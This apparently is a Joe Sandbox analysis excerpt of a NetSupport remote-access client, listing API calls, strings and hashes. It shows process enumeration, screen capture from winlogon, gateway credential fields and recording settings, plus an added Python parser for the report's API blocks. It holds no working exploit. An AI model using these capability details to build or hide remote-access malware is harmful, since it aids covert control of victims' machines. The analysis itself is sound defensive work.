  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
• FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
• LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
• CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
• GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
• CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
• FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
• FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
• String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
• API String ID: 348974188-2591373181
• Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
• Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
• Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
• Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
APIs
• SetEvent.KERNEL32(00000314), ref: 6CA8EEC7
• WaitForSingleObject.KERNEL32(00000318,00001388), ref: 6CA8EED5
• TerminateThread.KERNEL32(00000318,000000FF), ref: 6CA8EEF5
• CloseHandle.KERNEL32(00000318), ref: 6CA8EF07
• SetEvent.KERNEL32(00000320), ref: 6CA8EF16
• ctl_hangup.HTCTL32(00000001), ref: 6CA8EF26
• Sleep.KERNEL32(00000014), ref: 6CA8EFB8
• CloseHandle.KERNEL32(00000314), ref: 6CA8EFCE
• CloseHandle.KERNEL32(0000031C), ref: 6CA8EFD6
• CloseHandle.KERNEL32(00000320), ref: 6CA8EFDF
• WSACleanup.WSOCK32 ref: 6CA8EFE9
• CloseHandle.KERNEL32(0000030C), ref: 6CA8EFFB
• DeleteCriticalSection.KERNEL32(00000002), ref: 6CA8F01F
• DeleteCriticalSection.KERNEL32(6CACB898), ref: 6CA8F03A
• _free.LIBCMT ref: 6CA8F043
  • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
  • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
• _free.LIBCMT ref: 6CA8F04F
• _free.LIBCMT ref: 6CA8F07B
• _free.LIBCMT ref: 6CA8F08D
• _memset.LIBCMT ref: 6CA8F0A1
• FreeLibrary.KERNEL32(?), ref: 6CA8F0BB
• timeEndPeriod.WINMM(00000001), ref: 6CA8F0D6
  • Part of subcall function 6CA84610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 6CA84698
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                                                                    • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                                                                    • API String ID: 2861375113-448471891
                                                                                                                                                    • Opcode ID: 637fa35fac34575dd038f232f9804863253a91d2af1efe7262cc881950f35a3b
                                                                                                                                                    • Instruction ID: 4948849df337a0648aca4dff82b222c7e33c76cd2a0325973506554bae350151
                                                                                                                                                    • Opcode Fuzzy Hash: 637fa35fac34575dd038f232f9804863253a91d2af1efe7262cc881950f35a3b
                                                                                                                                                    • Instruction Fuzzy Hash: C1518DB1B0130BAFDF04DFB8DD84D9B73B8AB45308B148529E515D7A40DB31DA8ACBA1

APIs
  • Part of subcall function 6CA82A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CA82ACB
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82ADA
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82AEA
  • Part of subcall function 6CA82A90: wsprintfA.USER32 ref: 6CA82B05
• GetModuleHandleA.KERNEL32(NSMTRACE,6CA82AB1), ref: 6CA82CFA
• GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 6CA82D15
• GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 6CA82D22
• GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 6CA82D2F
• GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 6CA82D3C
• GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 6CA82D49
• GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 6CA82D56
• GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 6CA82D63
• GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 6CA82D70
• GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 6CA82D7D
• GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 6CA82D8A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
• String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
• API String ID: 3896832720-3703587661
• Opcode ID: bd58ea94d43a4ae9db1f4234eb55409498ac431ab24dbfaf52b9cff4f931bfe5
• Instruction ID: 11b9e0a432b42503a4ef35657d4b7aeb04d619024e266585439653afbaef0dee
• Opcode Fuzzy Hash: bd58ea94d43a4ae9db1f4234eb55409498ac431ab24dbfaf52b9cff4f931bfe5
• Instruction Fuzzy Hash: 4E0190B5F523DD6ECF58AB7A9C09D873AF8BB96311B028917F004D2600E6744586CFE2
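Added here as a worked example (it is not Joe Sandbox tooling and not code from the NetSupport client): a small Python parser for the "APIs" block of a function card such as the one above. Each bullet becomes a record with the API name, module, argument tokens, call-site address and, where present, the subcall function that actually makes the call. From those records it pulls the names handed to GetProcAddress, which is how the NSMTRACE exports listed above are resolved at run time, and any string literal that appears as an argument, such as the registry path on a later card. The two sample blocks are copied from this report; the record layout and function names are this example's own.

```python
"""Parse the 'APIs' block of a Joe Sandbox function card into records.

Added example for this report, not Joe Sandbox's own code and not part of
the analysed NetSupport client. The sample text below is copied from the
report; everything else (names, record layout) is this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet is either
#   • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 6CA82D15
#   • _strrchr.LIBCMT ref: 6CA82ADA            (CRT call, no argument list)
# optionally prefixed with "Part of subcall function 6CA82A90: ".
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Joe Sandbox prints numeric arguments as 8 hex digits (optionally negative)
# and unknown ones as "?"; anything else is a string literal seen at the call.
_NUMERIC_OR_UNKNOWN = re.compile(r"-?[0-9A-Fa-f]{8}|\?")


@dataclass
class ApiCall:
    name: str            # e.g. GetProcAddress
    module: str          # e.g. KERNEL32, LIBCMT
    args: List[str]      # raw argument tokens, in call order
    ref: str             # address of the call site
    subcall: Optional[str] = None  # callee making the call, if not the card's own function


def parse_api_block(text: str) -> List[ApiCall]:
    """Return one ApiCall per bullet; section headers and non-API lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Arguments are comma separated; none of the literals in this report
        # contain a comma, so a plain split is sufficient here.
        args = raw.split(",") if raw is not None else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def resolved_exports(calls: List[ApiCall]) -> List[str]:
    """Export names passed to GetProcAddress, i.e. functions resolved at run time."""
    return [c.args[1] for c in calls
            if c.name == "GetProcAddress" and len(c.args) >= 2
            and not _NUMERIC_OR_UNKNOWN.fullmatch(c.args[1])]


def string_args(calls: List[ApiCall]) -> List[str]:
    """Every string literal that appears as an argument, in the order seen."""
    return [a for c in calls for a in c.args if not _NUMERIC_OR_UNKNOWN.fullmatch(a)]


# Copied from the NSMTRACE card in this report.
SAMPLE_TRACE = r"""APIs
  • Part of subcall function 6CA82A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CA82ACB
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82ADA
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82AEA
  • Part of subcall function 6CA82A90: wsprintfA.USER32 ref: 6CA82B05
• GetModuleHandleA.KERNEL32(NSMTRACE,6CA82AB1), ref: 6CA82CFA
• GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 6CA82D15
• GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 6CA82D22
• GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 6CA82D2F
• GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 6CA82D3C
• GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 6CA82D49
• GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 6CA82D56
• GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 6CA82D63
• GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 6CA82D70
• GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 6CA82D7D
• GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 6CA82D8A
Strings
"""

# Copied from the registry card further down in this report (one bullet).
SAMPLE_REG = r"""  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C"""

if __name__ == "__main__":
    trace = parse_api_block(SAMPLE_TRACE)
    print(f"{len(trace)} calls; exports resolved via GetProcAddress:")
    for name in resolved_exports(trace):
        print("  ", name)
    print("string literals in registry card:", string_args(parse_api_block(SAMPLE_REG)))
```

The subcall prefix is kept on the record rather than dropped, because a string seen in a subcall (the registry path above) is evidence about the callee, not about the card's own function; a triage script that merges cards by callee address can use it to de-duplicate.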

APIs
• OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
• GetDC.USER32(00000000), ref: 1105D2BB
• CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
• SelectObject.GDI32(00000000,00000000), ref: 1105D300
• GetTickCount.KERNEL32 ref: 1105D30F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
• GetTickCount.KERNEL32 ref: 1105D33C
• GetLastError.KERNEL32(?), ref: 1105D348
• GdiFlush.GDI32 ref: 1105D35C
• SelectObject.GDI32(00000000,?), ref: 1105D367
• DeleteObject.GDI32(00000000), ref: 1105D36E
• DeleteDC.GDI32(00000000), ref: 1105D378
• ReleaseDC.USER32(00000000,00000000), ref: 1105D384
• UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
• CloseHandle.KERNEL32(00000000), ref: 1105D396
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
• String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
• API String ID: 652520247-4094952007
• Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
• Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
• Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
• Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1

APIs
  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
  • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
• wsprintfA.USER32 ref: 1102B84D
  • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
• FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
• wsprintfA.USER32 ref: 1102B69E
• wsprintfA.USER32 ref: 1102B705
  • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
  • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
• String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
• API String ID: 2153351953-120756110
• Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
• Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
• Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
• Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61

APIs
• _memset.LIBCMT ref: 6CA94D1C
• _free.LIBCMT ref: 6CA94E16
• _free.LIBCMT ref: 6CA94E5D
• _free.LIBCMT ref: 6CA94E8B
• _free.LIBCMT ref: 6CA94EB9
  • Part of subcall function 6CA97B60: _sprintf.LIBCMT ref: 6CA97B77
  • Part of subcall function 6CA977E0: _free.LIBCMT ref: 6CA977EF
• _free.LIBCMT ref: 6CA94EF6
  • Part of subcall function 6CA863C0: EnterCriticalSection.KERNEL32(6CACB898,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA863E8
  • Part of subcall function 6CA863C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6CA863FA
  • Part of subcall function 6CA863C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6CA8D77B,00000000), ref: 6CA86412
  • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8643B
  • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8646F
  • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA864A3
  • Part of subcall function 6CA863C0: _memset.LIBCMT ref: 6CA865C8
  • Part of subcall function 6CA863C0: LeaveCriticalSection.KERNEL32(?,?,6CA8D77B,00000000), ref: 6CA865D7
  • Part of subcall function 6CA863C0: LeaveCriticalSection.KERNEL32(6CACB898,?,00000000,?,6CA8D77B,00000000), ref: 6CA865F2
• _free.LIBCMT ref: 6CA94EED
  • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
  • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
• _free.LIBCMT ref: 6CA94F09
• SetLastError.KERNEL32(?), ref: 6CA94F12
  • Part of subcall function 6CA88C30: _memset.LIBCMT ref: 6CA88C5B
  • Part of subcall function 6CA88C30: _free.LIBCMT ref: 6CA88CCC
  • Part of subcall function 6CA88B50: _memset.LIBCMT ref: 6CA88B68
  • Part of subcall function 6CA88B50: wsprintfA.USER32 ref: 6CA88B87
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                                                                    • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                                                                    • API String ID: 2025600352-1925890548
                                                                                                                                                    • Opcode ID: ce11a477061351c0179f90513373d507a6117b71c10de2fdf6da91f5923ffde4
                                                                                                                                                    • Instruction ID: 59a8d1ca52ffdc7c3da1761d70d666940a7e612904eb5b2254625fd416b3b95c
                                                                                                                                                    • Opcode Fuzzy Hash: ce11a477061351c0179f90513373d507a6117b71c10de2fdf6da91f5923ffde4
                                                                                                                                                    • Instruction Fuzzy Hash: 32619EB2D00208ABDB11DFE4CD45FEEBBB8AF44308F144519E515AB745EB31A58DCBA1
APIs
• SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
• SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
• SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
• GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
• CloseHandle.KERNEL32(00000000), ref: 1113B8FB
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
• String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
• API String ID: 3054845645-718119679
• Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
• Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
• Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
• Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• wsprintfA.USER32 ref: 110EB5D8
• GetTickCount.KERNEL32 ref: 110EB632
• SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
• GetTickCount.KERNEL32 ref: 110EB64E
• SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
• OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
• SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
